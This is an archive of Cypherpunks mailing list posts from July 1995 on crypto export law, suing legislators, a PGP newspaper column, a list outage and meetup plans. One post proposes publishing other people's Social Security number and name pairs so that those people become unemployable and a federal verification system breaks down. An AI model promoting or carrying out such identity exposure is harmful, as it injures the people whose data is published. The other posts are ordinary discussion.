-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAaOQKfb4pLe9tolAQF8EgQApwrvjBHEPkI2VWG9NaaFU4yHKtkj9EZX
ok3xvAfIYslKqPOJ1nJH9KBxBxNk7Dk8xMPxfnfGzPWyUqwLyeBofSdTxTmWf+An
6OiVeT4RLLIJadQbunJHhXZHq7sdOH7HKQ8SpvGSXC0/ZT1XAPOjf6swBBC0LRWS
Rb8wlPCy4zs=
=cKVs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schwartz@bach.convex.com (Adam E. Schwartz)
Date: Fri, 14 Jul 95 12:49:15 PDT
To: nsamuels@Mars.mcs.com (Nicholas Samuels)
Subject: Re: The MoJo Wire thanks you
In-Reply-To: <Pine.3.89.9507140848.C14641-0100000@Mars.mcs.com>
Message-ID: <199507141542.KAA12126@bach.convex.com>
MIME-Version: 1.0
Content-Type: text/plain


hello everybody,

Please direct all your future replies related to this message and the
Mother Jones junk to

	truher@mojones.com

Also, please do *not* "group reply":  check to ensure that only 
truher@mojones.com is included in the "To:" part of the email
header, and do not include anyone in the "Cc:" part of the
email header.

Thanks very much.

(BTW, I have absolutely nothing to do with Mother Jones or its WWW site.)



Nicholas Samuels writes:
>
>With this message, you also included a note from silversh@rmmi.com, 
>wishing to "unsubscribe."  Since I don't administer your listserv, you 
>might want to do something with that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 14 Jul 95 07:51:03 PDT
To: cypherpunks@toad.com
Subject: Re: HR361
Message-ID: <9507141445.AA10682@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


  Has anyone previously noted that HR361, the omnibus export
  administration act, would require the administration to assess the
  impact of the current crypto export controls on the software industry?

I don't recall seeing mention of it, but this has been planned for
awhile.  There were a couple of crypto surveys, one by private industry
(software publisher's association) and one by TIS for the gov't.  I think.

Both were mentioned in this list.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 14 Jul 95 08:19:00 PDT
To: cypherpunks@toad.com
Subject: Re: LD tentacle?
Message-ID: <9507141513.AA10727@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> From: jbass@dmsd.com (John L. Bass)

He is a long-long-time Unix hacker.  Designed the first file-locking
stuff (flock?) and gave it away to the Unix community.  Last I heard
was working on high-performance filesystems.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 08:19:30 PDT
To: cypherpunks@toad.com
Subject: MYS_fit
Message-ID: <199507141519.LAA15117@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-14-95. NYPaper Page Oner, longish:


   "2 Groups of Physicists Produce Matter That Einstein
   Postulated."

      By chilling a cloud of atoms to a temperature barely
      above absolute zero, scientists at a Colorado laboratory
      have at last created a bizarre type of matter that had
      eluded experimenters ever since its potential existence
      was postulated by Albert Einstein 70 years ago. The
      creation of this Bose-Einstein condensate -- named for
      Einstein, and the Indian theorist Satyendra Nath Bose --
      was hailed yesterday as the basis of a new field of
      research expected to explain some fundamental mysteries
      of atomic physics. A Texas group later produced similar
      results. The achievement should allow physicists to peer
      directly into the realm of the ultrasmall.     MYS_fit


   [This was also reported in The Economist of July 1.]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 14 Jul 95 08:21:52 PDT
To: merriman@arn.net (David K. Merriman)
Subject: Re: Root Causes
Message-ID: <199507141521.LAA09745@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:42 PM 7/13/95 -0500, David K. Merriman wrote:

>Is there any precedence or possibility of either filing civil or criminal
>charges against a Government official for their _official_ actions?
>Something that will not only make for some Serious Press, but hit them from
>an unexpected angle?

Constitution of the US
 
Article 1, Section 6

(1.) The Senators and Representatives shall receive a Compensation for 
their Services to be ascertained by Law, and paid out of the Treasury of the 
United States. They shall in all Cases, except Treason, Felony and Breach 
of the Peace, be privileged from Arrest during their Attendance at the 
Session of their respective Houses, and in going to and returning from the 
same; and for any Speech or Debate in either House, they shall not be 
questioned in any other Place.


DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 08:21:27 PDT
To: cypherpunks@toad.com
Subject: SEK_hep
Message-ID: <199507141521.LAA15320@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-14-95. NYPaper:


   "U.S. Spells Out Antitrust Inquiry Into Microsoft."

      The Justice Department said today that the Microsoft
      Corporation might well be violating antitrust laws by
      including software for its new on-line network in
      Windows 95, its much-anticipated operating system for
      personal computers.                            JUS_kid


   "Sting on Internet Leads to a Child Sex Case."

      In a case involving child pornography, the Internet and
      a self-appointed enforcer whom one critical defense
      lawyer calls an "electronic vigilante," a Nevada man is
      facing prison for crossing state lines with the
      intention of having sex with a 14 year-old girl he had
      met on a popular computer network.             SHE_dev


   [Editorial] "The Guns of Waco and Ruby Ridge."

      There is little doubt that the Federal Government
      contributed heavily to two of the biggest law
      enforcement fiascoes in recent memory. One was the
      disastrous 1993 Federal raid on the Branch Davidian
      compound at Waco, Tex. The other was the tragic 1992
      encounter between the F.B.I. and a band of white
      separatists at Ruby Ridge, Idaho.              LIT_bub



   3:  SEK_hep







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Fri, 14 Jul 95 11:31:42 PDT
To: cypherpunks@toad.com
Subject: Re: Legislation question...
In-Reply-To: <199507140331.AA07147@tyrell.net>
Message-ID: <199507141831.LAA07706@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
 > BTW, in re suing congressmen
 > 
 > "The Senators and Representatives shall [...] in all cases, except
 > treason, felony and breach of the peace, be privileged from arrest
 > during their attendance at the session of their respective Houses, and
 > in going to and returning from the same; and for any speech or debate
 > in either House, they shall not be questioned in any other place."
 > 
 > The last part being operative.

Article VI

Clause 3. The Senators and Representatives before mentioned, and the
          Members of the several State Legislatures, and all executive
          and judicial Officers, both shall be bound by Oath or
          Affirmation, to support this Constitution; but no religious
          Test shall ever be required as a Qualification to any Office
          or public Trust under the United States. 

Does any mechanism exist for removing Oath-breakers from office?  Any
member of Congress who proposes or votes for (as distinguished from
"speech or debate") unconstitutional legislation has clearly violated
their Oath, and hence are no longer legitimate holders of the office.

     Would someone who refused to be "bound by Oath or Affirmation" be
allowed to take a seat in the Congress?  If not, why should an
Oath-breaker be allowed to?

     Yes, I know, they'll do whatever the hell they want.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 14 Jul 95 08:51:06 PDT
To: cypherpunks@toad.com
Subject: Proposed SS#/Federal Job Licensing DOS Attack
Message-ID: <199507141550.LAA15525@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On another subject entirely...

I have naturally been concerned about the Feds' proposal to set up
a national job licensing system.  In order to protect us from
hordes of illegals, they have suggested that employers be required
to check SS#-True Name matches before employment could begin.

This amounts to requiring federal permission for the 55 million 
annual job changes.  Initially, it is supposed to be restricted to
checking SS# validity, name match, and non multiple use.  Later (as with
driver's licenses) they will add restrictions having to do with tax
compliance, child support compliance, library fine compliance, etc.
After all, we wouldn't want tax evading, deadbeat dad, library
scofflaws working in Amerika, would we?

This suggests an interesting Denial of Service (DOS) attack.  If
you published your own or others' SS#-True Name pairs on a public
forum (currently completely legal BTW), multiple use could be 
encouraged, the TrueNames would become unemployable, and interesting
litigation would result.  If done enough, systemic breakdown would
occur.

I am anxious to see the regs (they are just at the talking stage) to
see how they handle "exceptions" like this.

DCF

"Who in spite of the fact that he has changed jobs since November 1986, has
yet to fill out an I-9 form.  He *loves* contract employment." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey Barth <jbarth@cozumel.picnet.com>
Date: Fri, 14 Jul 95 11:56:14 PDT
To: Nicholas Samuels <nsamuels@Mars.mcs.com>
Subject: Re: The MoJo Wire thanks you
In-Reply-To: <Pine.3.89.9507140848.C14641-0100000@Mars.mcs.com>
Message-ID: <Pine.SGI.3.90.950714121749.6465B-100000@cozumel>
MIME-Version: 1.0
Content-Type: text/plain


I am not sure if you realize that this discussion is appearing all over 
the place.  I am somewhat interested in this conversation, but not really.

==================================================================  
                 Potomac Interactive Corporation
------------------------------------------------------------------
E-mail: jbarth@picnet.com  Voice: 703.276.0181   Fax: 703.276.2981 
==================================================================

On Fri, 14 Jul 1995, Nicholas Samuels wrote:

> With this message, you also included a note from silversh@rmmi.com, 
> wishing to "unsubscribe."  Since I don't administer your listserv, you 
> might want to do something with that.
> 
> On Thu, 13 Jul 1995, Joel B. Truher wrote:
> 
> > Thank you for your help in our beta test!  Please come back soon,
> > and send me mail if you'd like to be removed from this mailing
> > list -- we may send a new Web product announcement every few months,
> > and you'll soon receive a survey of your opinion of our site.
> > 
> > More info on The MoJo Wire:
> > 
> > 
> >              "More fun than a secret decoder ring!"
> >                                -- Jim Hightower
> > 
> >   "Mother Jones magazine is turning the tables [on Gingrich]"
> >                                -- LA Times
> > 
> > Mother Jones is pleased to announce the official release of our
> > redesigned WWW site, now called The MoJo Wire, on July 14th, at:
> > 
> >                     http://motherjones.com
> > 
> > * See Newt Gingrich's secret list of major funders on our "Coin-
> >   Operated Congress" feature.  Gingrich is fighting the FEC in
> >   court to keep this information secret, but you can see it here
> >   for the first time.  See the ten worst, the ten richest, the
> >   dirt on all of them, and help complete this interactive
> >   investigation project.
> > 
> > * Newly revamped on-line chat software, called Live Wire,
> >   provides the best Web-based political discussions anywhere.
> >   Create hyperlinks in the words of others in this new feature,
> >   which already contains several lively debates.
> > 
> > * The July/August issue of Mother Jones magazine is available
> >   only on The MoJo Wire.  Read the full text of the magazine.
> > 
> > Many thanks to our team of two thousand beta testers!  With your
> > help, we've worked a few of the last kinks out of the system,
> > added a few things, and now offer the service password-free.
> > 
> > For more information about The MoJo Wire, send mail to
> > truher@mojones.com, or call me at 415-665-6637.
> > 
> > Joel Truher
> > Manager, The MoJo Wire
> > 
> > 
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Fri, 14 Jul 95 09:48:09 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <199507141652.LAA20979@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Doug Barnes wrote:
>This means, for those not reading between the lines, doing something
>more than online ranting and petition-signing, such as getting out the
>checkbook and supporting those who are organized to fight these things,
>and actually getting off the dime and doing things like writing letters,
>sending telegrams, and otherwise harassing our elected beings through
>media that they understand (since, clearly, they _don't_ understand
>the Internet -- if they did, they wouldn't propose legislation like this.)
>
>Yes, the "bad guys" can crank out unfriendly legislation faster than
>the "good guys" can fight it, but since we are clearly not ready to offer
>technological solutions this month, the "good guys" act as a valuable
>brake on this current swing of the pendulum.
>
Cypherpunks can do more by being cypherpunks.  Your keyboards are
better weapons than checkbooks in this case.  Why isn't PGP so simple
that every luzer on AOL will use it without thinking?  Why hasn't
the NetScape key been broken?  Prove these proposed laws are just as
silly and ineffective as they look by demonstrating it.

Lots of people will attack these laws on legal grounds, and you should
too if your conscience so moves you, but very few have the
capabilities to attack them on technical grounds where their
vulnerabilities are real, not just a matter of opinion.

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Fri, 14 Jul 95 10:35:24 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: misfeasance in office (was: Re: Root Causes)
In-Reply-To: <9507140252.AA13485@snark.imsi.com>
Message-ID: <Pine.3.89.9507141215.B8511-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> David K. Merriman writes:
> > 
> > Is there any precedence or possibility of either filing civil or criminal
> > charges against a Government official for their _official_ actions?
> 
> Not only is it a bad idea politically, but in fact members of congress
> are made specifically immune by the constitution from any legal action
> being taken against them for their words or actions during sessions of
> congress by any body other than congress.

While I recognize this to be the case, it remains exceedingly
frustrating.  It would seem that a textbook example of
misfeasance (not malfeasance) would be the act of introducing
and/or participating in the passage of legislation that a
member knew or should have known was unconstitutional -- at
least when misfeasance is defined as "the performance of a duty
or right which one has the right to do, but in a manner such as
to infringe upon the rights of others."  [anno. 20 ALR 104]

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Fri, 14 Jul 95 10:42:52 PDT
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: Suing/Reputations (was: Root Causes)
In-Reply-To: <199507140314.XAA05815@yakko.cs.wmich.edu>
Message-ID: <Pine.3.89.9507141223.A8798-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995, Damaged Justice wrote:

> Title 42 of the United States Code is the section that describes
> the process by which one may sue a government official. However:
> 
> "...an officer may be held liable in damages to any person injured in
> consequence of a breach of any of the duties connected with his
> office...The liability for nonfeasance, misfeasance, and for malfeasance
> in office is in his 'individual', not his official capacity..." 70
> AmJur2nd Sec. 50, VII Civil Liability.
> 
> So the trick is to sue the offender as an individual, and not as a
> government official.

I composed my "misfeasance in office" post before reading this
thoughtful  and well researched message from Damaged Justice.
I had read all of the messages in my mailbox with "Re: Root
Causes" as the subject, but missed this one, since the subject
line had been changed.

Damaged Justice has looked into this in much greater depth than
I have, and raises some interesting possibilities.  
(Obviously, IANAL.)

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 14 Jul 95 10:45:10 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Minnesota Cypherpunks Meeting
Message-ID: <Pine.ULT.3.91.950714124244.8005A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I mentioned this before and there seemed to be support, but I wanted to 
bring it up again hoping somebody in the cities can grab the ball and run 
with it (I doubt y'all wanna drive to Mankato :-)

Anybody wanna plan for a Minnesota CP Physical meeting sometime soon?  
Maybe on Friday the 28th or something?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Fri, 14 Jul 95 10:25:00 PDT
To: cypherpunks@toad.com
Subject: (none)
Message-ID: <2387@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


 In message
<Pine.ULT.3.91.950713200640.19067A-100000@krypton.mankato.msus.edu> "Robert A. Hayden" writes:

 [major cuts everywhere]
 > 
 > I've received about a dozen requests to clarify my rant earlier about 
 > what I think needs to be done about the future of the CPs and the net, 
 > now that the official declaration of war has been made by the government. 
 
 Let's all take a deep breath here. If the Grassley bill becomes
 law, this sort of talk may have merit. At this stage, it's too
 strong.  So far the only declaration made is by one or more 
 Senators, not "the government".

> 2)	PUSH FOR UNIVERSAL DIGITAL SIGNATURES
> In my version of utopia, all digital messages are signed.  Unfortunately,
> right now, there are no mechanisms in place to achieve that.  
 
 Sadly, the American Bar Association project that is writing model 
 legislation for this has been delayed.  A public discussion 
 draft, which should really move the ball forward, is not going 
 to happen until after our next meeting in August.  Expect 
 something published on the web in mid-September. Model 
 legislation is needed to sort out liability issues, for example, 
 without which large companies are afraid to enter the business.
 
 -- 
 Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
 U.Miami School of Law                                     London, England
 mfroomki@umiami.ir.miami.edu <-- this will still find me
 PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alan.pugh@internetmci.com (Alan Pugh)
Date: Fri, 14 Jul 95 10:14:35 PDT
To: cypherpunks@toad.com
Subject: pgp mention
Message-ID: <01HSV0ZF4V7M937K02@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

hello all,

nothing new here. there are some obvious errors in this article, most
notably that it claims phil z. uploaded pgp to the internet, while
phil claims this is not so. 

anyhow, i figure mention in the mass press is reason enough to post
here...


===begin===
Date: Thursday, 13-Jul-95 05:12 AM


Encryption software keeps unauthorized readers out of your e-mail

I think you've known me long enough to trust me. So I hope you won't
mind letting me read your mail. 

What's that? You object to my reading your mail? You say that your
private correspondence is none of my business? 

Fair enough. I feel the same way about my mail. That's why I put my
letters in envelopes. But what about the messages we exchange over
computer networks? 

Any computer is a profoundly insecure place for storing private
information.  As more people communicate over computer networks, they
expose themselves to severe embarrassment, or worse. A determined
government agency or corporation could tap the Internet or other data
networks, and gather all manner of financial, political or personal
information. 

But the same technology that makes this snooping possible is making it
possible for people to make communications virtually unreadable by
anyone except the people they're meant for. 

It's done using software that encrypts information -- turns it into a 
collection of gibberish. But this mishmash of symbols can be read by
someone who possesses the key, a kind of electronic letter-opener. 

Encryption has been around quite awhile. The first coded messages we
know about were sent by the soldiers and diplomats of Sparta about
2,400 years ago.  But few private citizens have ever bothered to
write in code. Most of us don't have many secrets. And the few we do
have aren't important enough to justify the immense complexity of a
really good code system. 

But when you have millions of people swapping E-mail on easily tapped
computer networks, attitudes start to change. Especially when the
computer itself can encode your messages in a form that's nearly
unbreakable. 

The idea is to apply an algorithm, or mathematical formula, that can
be used to code and decode any message. By the way, you don't have to
keep the formula secret. If the algorithm is really good, it won't
matter if a potential code-breaker knows it by heart. Run a message
through the algorithm, and even an expert code-breaker will need the
key to read it. 

Traditionally, going for the key has been the best way to break a
code. British and American researchers during World War II figured
out the keys to the German Enigma coding machine, and read Hitler's
mail. 

But in 1971, Whitfield Diffie and Martin Hellman came up with a much
tougher coding scheme, called public key cryptography. It relies on
two keys. One, the public key, is used only to encode messages. You
give this key to everybody who wants to send you a coded message. 

But the public key can't be used to read messages. For that, you use a
second, private key. When you receive a coded message, you run it
through your coding program along with your private key. 

Each key is a collection of letters and numbers generated by the
coding program. The longer the keys, the tougher it is to break the
code. But even a state-of-the-art public key system can be broken.
All you'll need is a supercomputer and several million years -- the
time it'll take to work through every possible solution. 

It also takes a fair amount of computing power to use a public key
system.  When Diffie and Hellman came up with the idea, only
corporations and governments had computers capable of the job. Now,
millions of us do. 

In addition, we now link these machines together over worldwide
networks.  Millions of us use computer networks to make credit-card
purchases, exchange business data, or write love letters. All of
which means we need a way to ensure that information we send can be
read only by those it's aimed at -- cryptography for the masses. 

And now we have it, thanks to Philip Zimmermann, anti-nuclear
activist, software engineer and author of Pretty Good Privacy (PGP).
It's a program many cryptography experts consider well-nigh
unbreakable. 

You can order a commercial version of PGP from ViaCrypt, an Arizona
company.  You pay $100 for the DOS version, $125 for Windows or Mac.
Call 1-602-944-0773, 10-7 weekdays. 

But the original PGP program is freeware. You can download it at no
charge from the Massachusetts Institute of Technology's FTP site
(net-dist.mit.edu, in the pub/PGP directory) or from the National
Computer Security Association Forum on CompuServe. The latest version
is called PGP262.ZIP. 

When you try to download PGP, you'll be asked whether you're a U.S.
citizen.  If you don't answer yes, you won't get the program. 

MIT and CompuServe don't care if you're phoning in from Jupiter.
They're just trying to protect themselves. They don't want to end up
like Zimmermann, who has spent the last three years trying to keep
out of jail. 

It all began in 1991, when Zimmermann was designing PGP. He heard
Congress was considering a law to ban the use of encryption software.
His left-wing instincts roused, Zimmermann quickly finished his
program, and then uploaded it to an Internet site. Once unleashed, no
government would be able to restrict PGP. 

Sure enough, PGP was soon being used by people all over the United
States. No problem -- the bill never passed. But when Internet users
outside the U.S.  started downloading it, the federal government put
the Zimmermann case in front of a grand jury. 

It seems that selling encryption software to foreigners is a federal
crime, on the same scale with peddling plutonium. The fact that
Zimmermann didn't sell PGP may or may not help him. The grand jury
has been at work since 1992, trying to decide whether to issue an
indictment. Zimmermann could get up to four years in prison. 

It's easy to denounce this assault on freedom, but the authorities
have a point. Most PGP users are honest citizens with a taste for
privacy. But the coding and encoding software works just as well for
terrorists, mobsters or child molesters. Cheap, powerful encryption
software will make life a lot tougher for the people who work to keep
us all safe. 

But then, the cops would also have an easier job if we all just agreed
to let them open everybody's mail. How about it? 

X X X 

(You can send electronic mail to Hiawatha Bray. If you're on the
Internet, send it to: watha(at)det-freepress.com; On Compuserve,
write to: 72662,2521; America Online users, write to: WathaB.) 

KNIGHT-RIDDER-WASHINGTON--07-12-95 0914EDT 
   -0- By Hiawatha Bray Knight-Ridder Newspapers

*** End of story ***




-----BEGIN PGP SIGNATURE-----
Version: 2.61

-----END PGP SIGNATURE-----
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandelbrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Fri, 14 Jul 95 11:25:25 PDT
To: cypherpunks@toad.com
Subject: List Crash?
Message-ID: <9507141823.AA01659@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



I see the cypherpunks' mailing list lost its mind again.  It has been
awhile since this happened.

Was it an accident or sabotage?

Loren




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 14 Jul 95 12:41:37 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: DOH!
Message-ID: <Pine.ULT.3.91.950714144121.10730C-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I see that the subscription rolls got nuked again.  *sigh*

Did I miss anything juicy after the rants of yesterday?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Fri, 14 Jul 95 13:11:04 PDT
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <Chameleon.4.01.2.950714150955.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


"Overweaning."  "Iowa."  Yes, yes, I know.  Fingers think for 
themselves.  Too used to typing "weenie."  Just read DOJ report.  Don't 
write.

Bolivar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 14 Jul 95 12:07:23 PDT
To: cypherpunks@toad.com
Subject: Toad Hit?
Message-ID: <199507141907.PAA15038@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there an after-action report available?



Responding to msg by Majordomo@toad.com () on Fri, 14 Jul 11:58 AM

>--
>
>Your request of Majordomo was:
>>>>> who cypherpunks
>Members of list 'cypherpunks':
>
>Panu.Rissanen@lut.fi
>hugh
>eric@remailer.net
>gnu
>losburn@omcssi.com
>adwestro@ouray.cudenver.edu
>krs@caos.aamu.edu
>hfinney@shell.portal.com
>tomb@syntec.com
>hank@rumple.org
>tcmay@sensemedia.net
>heling@harry.sar.usf.edu
>bbrown@gtenet.com
>cypherpunks@cs.du.edu
>rittle@comm.mot.com
>bdolan@use.usit.net
>jfleming@copper.ucs.indiana.edu
>jya@pipeline.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Fri, 14 Jul 95 12:40:07 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Root Causes
In-Reply-To: <199507140151.UAA01504@arnet.arn.net>
Message-ID: <Pine.3.89.9507141530.A8090-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain


I think this is a good idea...

On Thu, 13 Jul 1995, David K. Merriman wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> While I respect the ideas and opinions submitted by the majority of the
> members of this list, I wonder if perhaps we're failing to deal with the
> _root_ problem of such things as the CDA, Clipper, DTA, etc.
> 
> Specifically, I wonder if it wouldn't be a better approach to *prevent* such
> measures from ever being proposed in the first place.
> 
> (pause to adjust nomex undies and titanium body armor :-)
> 
> Is there any precedent or possibility of either filing civil or criminal
> charges against a Government official for their _official_ actions?
> Something that will not only make for some Serious Press, but hit them from
> an unexpected angle?
> 
> (close hatch on bunker :-)
> 
> It would seem that things such as the CDA, etc, are patent violations of the
> Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such
> measures be violating our civil rights, and thus be criminally liable?
> Aren't Congressrodents supposed to take an Oath of Office that involves
> upholding the Constitution?
> 
> Alternatively, could a civil suit be filed for invasion of privacy or
> somesuch? Or perhaps the previously mentioned violation of civil rights (a
> la Rodney King)?
> 
> How many laws, etc, can we invoke? I mean, most congresscritters don't craft
> laws on their own, so the involvement of their staff would constitute
> conspiracy, as well, wouldn't it?
> 
> I'd think that if a few of the <insert favorite expletive here> were sued
> and/or tried, it would sure make the rest of them consider the full
> implications of any laws they might consider proposing. Too, it might
> accidentally ripple through all of the Government, and settle down some of
> the bureaucrats that aren't subject to voters.
> 
> IANAL, of course, so I'll leave it up to those on the list who are to
> express more informed opinions; still, it _seems_ like a possible course of
> action.....
> 
> Dave Merriman
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> -----END PGP SIGNATURE-----
> This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
> of the PGP executable. See below for getting YOUR chunk! 
> ------------------ PGP.ZIP Part [015/713] -------------------
> M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
> MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
> M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
> -------------------------------------------------------------
> for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
> 
> 
> 

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Fri, 14 Jul 95 14:01:14 PDT
To: Govaccess@well.com
Subject: Free The World Web Server project.. :)
Message-ID: <Pine.3.89.9507141638.A8442-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain



15:57 EST
July 14th, 1995
New Haven, CT. 

	From the Yale Computer Center:

	Got an idea for y'all, from the heart and mind of Elizabeth 
Walker, with whom I live.

	 Let's set up a web site where someone can submit a letter that 
will be automatically sent to every senator, congressperson, elected and 
appointed federal official. If we run into trouble, we can scale it down, 
narrow the various target areas...

	Also, we could write our own letters, post them, and if someone 
wants to resend it, they could do so at the click of the mouse.

	Example, someone logs on to the Freedom Speaks webserver, and is 
greeted by the message, "Welcome, enter your message for Federal 
officials in the box provided, then hit the submit button." 

	"If you would like to submit one of our pre-written letters, just 
click on any of the ones you see below." 

	For those without web access, we could set up a mailing list to 
do the same.

